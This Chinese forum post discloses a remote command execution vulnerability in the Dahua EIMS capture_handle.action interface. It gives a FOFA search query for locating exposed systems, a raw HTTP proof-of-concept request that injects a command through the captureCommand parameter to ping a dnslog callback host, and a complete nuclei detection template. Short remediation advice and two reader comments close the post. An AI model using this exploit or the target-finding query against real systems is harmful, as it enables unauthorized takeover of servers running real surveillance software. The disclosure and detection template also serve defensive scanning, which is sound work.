大华 EIMS-capture_handle.action接口存在远程命令执行漏洞

我是大白   ·   发表于 2024-03-08 11:57:14   ·   漏洞文章

大华 EIMS-capture_handle.action接口存在远程命令执行漏洞

漏洞描述

大华 EIMS-capture_handle.action接口存在远程命令执行漏洞,攻击者可利用该漏洞获取服务器控制权限。

产品界面

fofa语法

title="EIMS"

POC

  1. GET /config/asst/system_setPassWordValidate.action/capture_handle.action?captureFlag=true&captureCommand=ping%20bbb.z8o3wopy.dnslog.pw%20index.pcap HTTP/1.1
  2. Host:
  3. User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/

nuclei验证

  1. id: dahua-EIMS-RCE
  2. info:
  3. name: 大华 EIMS-capture_handle.action接口远程命令执行
  4. author: nobody
  5. severity: critical
  6. description: |
  7. 大华 EIMS-capture_handle.action接口存在远程命令执行漏洞,攻击者可利用该漏洞获取服务器控制权限.
  8. impact: |
  9. 攻击者可利用该漏洞远程执行命令
  10. remediation: |
  11. 升级版本,打补丁,白名单访问
  12. metadata:
  13. verified: true
  14. max-request: 3
  15. fofa-query: title="EIMS"
  16. tags: dahua,rce
  17. requests:
  18. - raw:
  19. - |
  20. @timeout:30s
  21. GET /config/asst/system_setPassWordValidate.action/capture_handle.action?captureFlag=true&captureCommand=ping%20{{interactsh-url}}%20index.pcap HTTP/1.1
  22. Host: {{Hostname}}
  23. User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0
  24. matchers-condition: and
  25. matchers:
  26. - type: word
  27. part: interactsh_protocol
  28. name: dns
  29. words:
  30. - "dns"
  31. - type: word
  32. part: body
  33. words:
  34. - "success"
  35. - type: status
  36. status:
  37. - 200

修复建议

  • 升级到最新版本
  • 非必要禁止公网访问或白名单访问

打赏我,让我更有动力~

2 条回复   |  直到 1个月前 | 389 次浏览

zbs
发表于 1个月前

挺好,有无详细信息

评论列表

  • 加载数据中...

编写评论内容

杜星翰
发表于 1个月前

这是做代审审计出来的吗?

评论列表

  • 加载数据中...

编写评论内容
登录后才可发表内容
返回顶部 投诉反馈

© 2016 - 2024 掌控者 All Rights Reserved.